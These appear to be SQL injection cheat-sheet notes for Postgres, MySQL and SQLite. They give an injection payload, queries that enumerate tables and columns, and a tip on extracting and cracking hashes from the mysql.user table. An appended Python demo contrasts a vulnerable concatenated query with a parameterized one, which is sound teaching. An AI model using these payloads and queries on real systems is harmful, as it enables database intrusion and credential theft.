SQL Injection
SQL Injection is a vulnerability where a user can inject SQL commands into a database query and have them executed.
SQL Injection Cheat Sheet | Netsparker
Postgres
Column names case sensitive!!
Syntax: ad' || 'min' or 1=1;--
Version: version()
Quotes: Single for values, double for column name
PostgreSQL: Documentation: 13: Chapter 51. System Catalogs
List tables: select string_agg(table_name, ',') from information_schema.tables where table_schema=current_schema()
List columns: select string_agg(column_name, ',') from information_schema.columns where table_name = 'table'
MySQL
Column names not case sensitive
Note: Password column of mysql.user only exists in MariaDB. Use authentication_string for vanilla MySQL. May have to use CrackStation.
mysql.user Table - MariaDB Knowledge Base
List tables: select group_concat(table_name) from information_schema.tables where table_schema=database()
List columns: select group_concat(column_name) from information_schema.columns where table_name = 'table'
SQLite
Column names not case sensitive
Metadata:
List tables and sql: select tbl_name, sql from sqlite_master
Get character: substr( string, start, length )
SQLite does not support concat function. But it supports || operator.
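Added example (not from the original page): the || syntax line from the Postgres section, fed to a string-concatenated SQLite query and to a parameterized one, to show why binding values closes the hole. The users table, its rows, and the function names are constructed for this example.

```python
import sqlite3

# The concatenation-style input shown on this page.
PAGE_INPUT = "ad' || 'min' or 1=1;--"


def make_db():
    """Build an in-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, role TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "administrator"), ("alice", "user"), ("bob", "user")],
    )
    return db


def lookup_concatenated(db, name):
    """Vulnerable: the input is pasted into the SQL text.

    A quote in the input ends the string literal, so the rest of the input
    is parsed as SQL and the trailing -- comments out the role filter.
    """
    query = "SELECT name FROM users WHERE name = '" + name + "' AND role = 'user'"
    return sorted(row[0] for row in db.execute(query))


def lookup_parameterized(db, name):
    """Hardened: the input is bound as a value and is never parsed as SQL."""
    query = "SELECT name FROM users WHERE name = ? AND role = 'user'"
    return sorted(row[0] for row in db.execute(query, (name,)))


if __name__ == "__main__":
    db = make_db()
    # Honest input: both forms return only the matching non-admin row.
    print("concatenated, alice:  ", lookup_concatenated(db, "alice"))
    print("parameterized, alice: ", lookup_parameterized(db, "alice"))
    # Page input: the concatenated form evaluates name = 'admin' OR 1=1
    # and returns every row; the parameterized form matches no name.
    print("concatenated, input:  ", lookup_concatenated(db, PAGE_INPUT))
    print("parameterized, input: ", lookup_parameterized(db, PAGE_INPUT))
```

The same bound-parameter pattern applies to the Postgres and MySQL drivers; only the placeholder syntax differs between drivers.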